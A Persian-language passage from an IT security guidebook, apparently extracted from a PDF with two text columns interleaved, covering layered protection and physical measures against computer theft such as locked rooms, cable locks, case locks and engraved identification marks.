ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﺧﺎﻧـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻭﺟـﻮﺩ ﻋﻴﺒـﻲ ﺩﺭ ﻣﺎﺷـﻴﻦ •
ﻫﺸﺪﺍﺭ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳﻼﻣﺖ ﺍﻓﺮﺍﺩ ﻣﺮﺗﺒﻂ ﺑﺎﺷﺪ ،ﺁﻥ ﻋﻴـﺐ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ •
ﺑﺎﻳﺪ ﺳﺮﻳﻌﹰﺎ ﺭﻓﻊ ﮔﺮﺩﺩ. )ﻣﺮﺍﻛــﺰ ﻛــﺎﺭﻱ ،ﻣــﺪﺍﺭﺱ ،ﺍﺩﺍﺭﻩﻫــﺎﻱ ﺩﻭﻟﺘــﻲ( ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ
ﺷﺨﺼﻲ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ١٠ﺟﻬﺖ ﺍﻋﻤﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ
ﻫﻨﮕﺎﻡ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻁ ﻛﺮﺩ ،ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ •
ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ.
ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻳﺘﺎﻥ ﻣﺸﻜﻞ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ.
ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺩﻳﮕـﺮﺍﻥ
ﺍﮔﺮ ﺩﺭ ﺭﻭﺯﻧﺎﻣﻪ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﭘﻠﻲ ﺷﻜﺴﺘﻪ ﺍﺳﺖ، •
ﻧﻴﺰ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ ﺗﻌﺎﻣـﻞ ﻣﻨﺎﺳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ
ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺮ ﺭﻭﻱ ﺁﻥ ﭘﺮﻫﻴﺰ ﺷﻮﺩ.
ﻧﻤﺎﻳﻴﺪ .ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ
ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻋﻮﺍﻣﻞ ﺑﺎﻻ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻗﺎﺩﺭ ﺑـﻪ ﺗـﻀﻤﻴﻦ ﺳـﻼﻣﺖ ﺩﻳﮕﺮ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫﺪ ﺷﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺸﺨﺺ
ﺷﻤﺎ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ ،ﻭﻟﻲ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻫﻤـﺔ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ ﻛﺮﺩﻥ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﮔﺮﻭﻫﻬﺎﻱ ﻳﻚ ﻳﺎ
ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺗﺼﺎﺩﻑ ﺭﺍ ﺗﺎ ﺣـﺪ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ ﺩﺍﺩ .ﺩﺭ ﭼﻨﺪ ﻧﻔﺮﻩ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ.
ﺗﺪﻭﻳﻦ ﺍﺟﺰﺍﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ ،ﺍﻓـﺮﺍﺩ ﺑﺎﻳـﺪ ﻻﻳـﻪﻫـﺎﻳﻲ ﺍﺯ
ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧـﺪ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣﺘـﻲ ﺗـﺎ ﺣـﺪﻭﺩﻱ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓﺮﺩﻱ
ﺗﻜﺮﺍﺭﻱ ﺑﺎﺷﻨﺪ .ﺑﺮﺍﻱ ﺩﺭﻙ ﺑﻬﺘﺮ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ
ﻳﻚ ﺗﻜﻪ ﺟﻮﺍﻫﺮ ﻗﻴﻤﺘﻲ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴـﺪ .ﻣـﺴﻠﻤﹰﺎ ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ .ﺍﻛﻨﻮﻥ ﻛﻪ ﺷﻤﺎ ﻣﻔﻬﻮﻡ ﺧﻄﺮﺍﺕ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩ ﻭ ﺩﺭ
ﺟﻌﺒﺔ ﺳﺮﺑﺴﺘﻪ ﻭ ﺳﭙﺲ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴـﺪ؛ ﻭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧـﺪ
ﺟﻬﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ،ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺳـﺮﻗﺖ ﻧﻴـﺰ ﺑﻴﻤـﻪ ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ ،ﻗﺎﺩﺭ ﻫﺴﺘﻴﺪ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓـﺮﺩﻱ ﺭﺍ
ﺧﻮﺍﻫﻴﺪ ﻧﻤﻮﺩ .ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﻋﻤﻞ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﭼﻨـﺪﻳﻦ ﻣﺮﺣﻠـﻪ ﺑــﻪ ﺍﺟــﺮﺍ ﺩﺭ ﺁﻭﺭﻳــﺪ .ﭘــﺲ ﺍﺯ ﺍﺭﺯﻳــﺎﺑﻲ ﻗﻴﻤﺘﻬــﺎ ،ﺯﻣــﺎﻥ ﻻﺯﻡ ﻭ
ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ .ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑـﻪ ﺗﻨﻬـﺎﻳﻲ ﺿـﺮﻳﺐ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﻮﺍﻫﺮ ﺭﺍ ﻛﻤﻲ ﺑﺎﻻ ﻣﻲﺑﺮﻧﺪ ،ﻭﻟﻲ ﻣﺴﻠﻤﹰﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ
ﻫﺮﭼﻨﺪ ﺑﺎ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺟﺎﻣﻌـﻪ ،ﺍﻳـﻦ ﻭﺿـﻊ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ ۹
ﺗﻤﺎﻡ ﻣﺮﺍﺣﻞ ﻋﺎﻗﻼﻧﻪﺗﺮ ﺍﺳﺖ ،ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﻣﺮﺣﻠـﻪ ﺑـﺎ ﻣﻲﺷﻮﺩ.
10 System Administrator
٥٣ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
11 Encryption
12 Security Best Practices
٥٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ
ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺸﻜﻠﻲ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺖ .ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻭ ﺧـﺼﻮﺻﹰﺎ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺑﻪ ﺳﺎﺩﮔﻲ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ
ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ .ﭼﻨﺎﻧﭽﻪ ﺳﺎﺭﻕ ﻣﺎﻳﻞ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪ
ﻧﺒﺎﺷﺪ ﻣﺮﺍﻛﺰ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﺯﺩﻱ ﻭ
ﻓﺼﻞ ﺳﻮﻡ
ﺩﺳﺖﺩﻭﻡ ﺭﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ .ﺑﺮﺧـﻲ ﺍﺯ ﺳـﺎﺭﻗﺎﻥ ،ﺭﺍﻳﺎﻧـﻪ ﻭ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ
ﻧﻤﺎﻳﺸﮕﺮ ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﻪ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺮﻧﺪ ﺑﻠﻜـﻪ ﻗـﺴﻤﺘﻬﺎﻱ
ﺑﺨﺶ ﺩﻭﻡ
ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭ ﺁﺯﺍﺭ ﺩﻫﻨﺪﻩ ﺍﺳﺖ ﻭ ﭼﻨﺎﻧﭽـﻪ ﺑﻴﻤـﻪ
ﻣﻘﺪﻣﻪ
ﻧﺒﺎﺷﻴﺪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺭﺍ ﺑﺮ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﺧﻮﺍﻫﺪ ﻛﺮﺩ .ﺩﺭ ﺑﻌـﻀﻲ
ﻣﻮﺍﻗﻊ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻋﺚ ﺍﻓﺸﺎﻱ ﺍﻣﻮﺭ ﺷـﻐﻠﻲ ﻭ ﻳـﺎ ﺍﺳـﺮﺍﺭ ﻳﻜﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩﻫـﺎﻱ ﺩﺭﻙ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ
ﻣﺤﺮﻣﺎﻧﺔ ﺍﺷﺨﺎﺹ ﻣﻲﮔﺮﺩﺩ ﻭ ﺩﺭ ﺷﺮﺍﻳﻂ ﺑـﺪﺗﺮ ،ﺳـﺮﻗﺖ ﺭﺍﻳﺎﻧـﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺿﺎﺑﻄﻪﻣﻨﺪ ١٣ﺍﺳﺖ .ﺑﺎ ﺷـﺮﻭﻉ ﺍﺯ ﻣﻌﺮﻓـﻲ
ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻐﻞ ﻣﻲﺷﻮﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﭼﻨﺎﻧﭽـﻪ ﺩﺭ ﺍﻳـﻦ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ،ﺩﺭ ﺳﺎﻳﺮ ﻓـﺼﻮﻝ ﺑﺨـﺶ ﺩﻭﻡ ﺑـﻪ
ﺧﺼﻮﺹ ﭼﻨـﺪ ﺭﻭﺵ ﺳـﺎﺩﻩ ﻭ ﺍﺭﺯﺍﻥﻗﻴﻤـﺖ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﺩ ﺑﺮﺭﺳﻲ ﺟﻮﺍﻧﺐ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﻭ ﺍﺳﺎﺱ ﺍﺳـﺘﻘﺮﺍﺭ
ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻭ ﻛﻴﻔﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛـﺮﺩ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑـﺮﺍﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷﺨـﺼﻲ ﻭ ﮔـﺮﻭﻩﻫـﺎﻱ
ﻳﺎ ﺣﺪﺍﻗﻞ ﺍﺣﺘﻤﺎﻝ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻛﺎﻫﺶ ﺩﺍﺩ. ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺗﻮﺿﻴﺢ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ .ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ
ﺟﻨﺒﻪ ﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴـﺖ ﺑـﺮﺍﻱ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﺰﺭﮔﺘـﺮ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ
ﺩﻭ ﺭﺍﻫﻜﺎﺭ ﺑﺮﺍﻱ ﭘﻴﺸﮕﻴﺮﻱ ﺍﺯ ﺩﺯﺩﻱ ﺭﺍﻳﺎﻧـﻪ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ :ﻛـﺎﺭﻱ
ﺣﺮﻓـﻪﺍﻱ ﺩﺭ ﺑﺨـﺶ ﭘــﻨﺠﻢ ﺍﺭﺍﺋــﻪ ﺷــﺪﻩ ﺍﺳــﺖ .ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺑــﺎ
ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ؛ ﻭ ﻳﺎ ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﻣﻴﻞ ﺑﻪ
ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﺎ ﻛﻠﻴﺎﺕ ﻣﻮﺿﻮﻉ ﺁﺷﻨﺎ ﺷـﺪﻳﺪ،
ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻛﺎﻫﺶ ﻳﺎﺑﺪ.
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻄﺎﻟﺐ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﭘﻨﺠﻢ )ﺍﻣﻨﻴﺖ
ﻛﺎﺭﻱ ﻛﻨﻴﺪ ﻛﻪ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﺩﺷﻮﺍﺭ ﺷﻮﺩ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ( ﺑﺮ ﺩﺍﻧﺶ ﻓﻨﻲ ﺧﻮﺩ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ.
ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺩﺷﻮﺍﺭ ﻛﺮﺩﻥ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ: ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻣﺤﻞ ﻧﮕﻬـﺪﺍﺭﻱ ﺭﺍﻳﺎﻧـﻪ ﺍﻣـﻦ • ﺍﻭﻟﻴﻦ ﻣﺮﺣﻠﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﺍﺯ
ﺍﺳﺖ .ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺩﺭ ﻳـﻚ ﺍﺗـﺎﻕ ﻟﺤﺎﻅ ﻓﻴﺰﻳﻜﻲ ﺍﻳﻤﻦ ﺍﺳﺖ .ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺑـﺴﺘﻪ ﺑـﻪ
ﻗﻔﻠﺪﺍﺭ ﻧﮕﻬﺪﺍﺭﻱ ﻧﻤﺎﻳﻴﺪ ﻭ ﻳﺎ ﺍﮔﺮ ﺩﺭ ﻣﺤﻞ ﻛـﺎﺭ ﺧـﻮﺩ ﺑـﺎ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻛﺠـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩﺍﻳـﺪ ﻳـﺎ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ
ﻫﻤﻜﺎﺭﺍﻥ ﺩﻳﮕﺮﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻴﺪ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺩﺭ ﻣﻌﺮﺽ ﺩﻳـﺪ ﺩﺍﺩﻩﻫﺎ ﺍﺯ ﭼﻪ ﺣﺴﺎﺳﻴﺘﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻫﺴﺘﻨﺪ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﻳﺎ
ﺁﻧﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﺤﺎﻓﻞ ﻋﻤﻮﻣﻲ ﻣﺎﻧﻨـﺪ ﻳﻚ ﻗﺴﻤﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻣﺤﺴﻮﺏ ﺷﻮﺩ.
ﻓﺮﻭﺩﮔﺎﻩﻫﺎ ﺑﺪﻭﻥ ﻣﺮﺍﻗﺒﺖ ﺭﻫﺎ ﻧﻜﻨﻴﺪ.
ﺍﮔﺮ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﻛﻪ ﺩﺭ ﺯﻣـﺎﻥ ﻋـﺪﻡ ﺣـﻀﻮﺭ ﺷـﻤﺎ ﺩﺭ •
ﻣﺤﻞ ﻛﺎﺭﺗﺎﻥ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷﺨـﺼﻲ ﺷـﺒﺎﻧﻪ ﻭﺍﺭﺩ ﺍﺗـﺎﻕ
13 Rule-Based Approach
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٥٦
ﺩﺯﺩﻳﺪﻥ ﺭﺍﻳﺎﻧﻪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﺨـﺼﺎﺕ ﺧـﻮﺩ ﺭﺍ ﺷﺪﻩ ﻭ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒـﺮﺩ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺁﮊﻳـﺮ ﺧﻄـﺮ
ﺑﺎ ﻋﻼﺋﻢ ﺛﺎﺑﺖ ﻭ ﻣﺎﻧﺪﮔﺎﺭ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩ ﺑﺮ ﺑﺪﻧﺔ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ.
ﺭﺍﻳﺎﻧﻪ ﺣﻚ ﻭ ﻳﺎ ﻧﻘﺎﺷﻲ ﻛﻨﻴﺪ .ﺍﻳﻦ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﺗﻮﺍﻧـﺪ ﺷـﺎﻣﻞ ﺟﻬﺖ ﺍﻳﺠﺎﺩ ﺍﻳﻤﻨﻲ ،ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻮﺳﻴﻠﺔ ﻛﺎﺑﻞ ﺳﻴﻤﻲ ﻭ •
ﺍﺳﻢ ﻳﺎ ﻣﺸﺨﺼﺎﺕ ﺩﻳﮕﺮ ﺑﺎﺷﺪ .ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﻪ ﺍﺯ ﺍﻳـﻦ ﻳﺎ ﺯﻧﺠﻴﺮ ﺑﻪ ﻣﻴﻠﻪ ،ﻟﻮﻟﻪ ﻳﺎ ﺍﺷﻴﺎﻳﻲ ﻛﻪ ﻗﺎﺑﻠﻴـﺖ ﺟﺎﺑﺠـﺎﻳﻲ
ﻧﻮﻉ ﻋﻼﻣﺘﻬﺎ ﺩﺭ ﻗـﺴﻤﺖ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻳـﺎ ﺷـﻜﺎﻓﻬﺎﻱ ﺩﻳﮕـﺮ ﻧﺪﺍﺭﻧﺪ ﻣﺘـﺼﻞ ﻛﻨﻴـﺪ .ﺍﺯ ﺍﻳـﻦ ﺭﻭﺵ ﺩﺭ ﻣﺤﺎﻓـﻞ ﻧـﺴﺒﺘﹰﺎ
ﺍﺳــﺘﻔﺎﺩﻩ ﻧﻨﻤﺎﻳﻴــﺪ .ﻫﻤﭽﻨــﻴﻦ ﺁﮔــﺎﻩ ﺑﺎﺷــﻴﺪ ﻛــﻪ ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﻋﻤﻮﻣﻲ ﻣﺜﻞ ﻣﺪﺍﺭﺱ ﻭ ﻳﺎ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻫﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ.
ﻋﻼﻣﺘﮕﺬﺍﺭﻱ ﺭﻭﻱ ﺑﺪﻧﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﺑﻄﺎﻝ ﺿﻤﺎﻧﺘﻨﺎﻣﻪ ﮔﺮﺩﺩ. ﺍﻛﺜﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺍﺭﺍﻱ ﻣﺤﻠﻲ ﻣﺨﺼﻮﺹ ﺍﺗﺼﺎﻝ ﻣﻲﺑﺎﺷـﻨﺪ.
ﻻ ﺩﺍﺭﺍﻱ ﻛﺎﺑﻠﻬﺎ ﻭ
ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻌﻤﻮ ﹰ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﺁﺳﻴﺐﭘﺬﻳﺮﻧﺪ
ﻗﻔﻠﻬﺎﻱ ﺑﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ.
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻧﺴﺒﺖ ﺑـﻪ ﮔـﺮﺩ ﻭ ﺧـﺎﻙ ﻭ ﺳـﻄﻮﺡ ﻧـﺎﻫﻤﻮﺍﺭ ﺣـﺴﺎﺱ
ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺭﺍﻱ ﻗﻔﻠﻲ ﻣـﻲﺑﺎﺷـﺪ ﻛـﻪ ﺍﺯ ﺑـﺎﺯ ﺷـﺪﻥ •
ﻫﺴﺘﻨﺪ .ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﻛﺮﺩﻥ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﻣﺤﻠﻲ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ ﻛـﻪ
ﺑﺪﻧﻪ ١٤ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲ ﻛﻨﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ .ﻣﻲﺗﻮﺍﻥ
ﮔﺮﺩ ﻭ ﺧﺎﻙ ﺩﺭ ﺁﻧﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﺮﺗﺒﹰﺎ ﺑﺎﻳﺪ ﺑـﺎ ﺩﻗـﺖ ﺯﻳـﺎﺩ ﺁﻧـﺮﺍ
ﺍﺯ ﭘﻴﭽﻬﺎﻱ ﻣﺨـﺼﻮﺹ ﻛـﻪ ﺑﺮﺍﺣﺘـﻲ ﻗﺎﺑـﻞ ﺑـﺎﺯ ﻛـﺮﺩﻥ
ﺗﻤﻴﺰ ﻛﺮﺩ ﺗﺎ ﺷـﻜﺎﻑ ﺗﻬﻮﻳـﻪ ﻣـﺴﺪﻭﺩ ﻧـﺸﻮﺩ .ﺑﺮﺧـﻲ ﺭﺍﻳﺎﻧـﻪﻫـﺎ
ﻧﻴﺴﺘﻨﺪ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ.
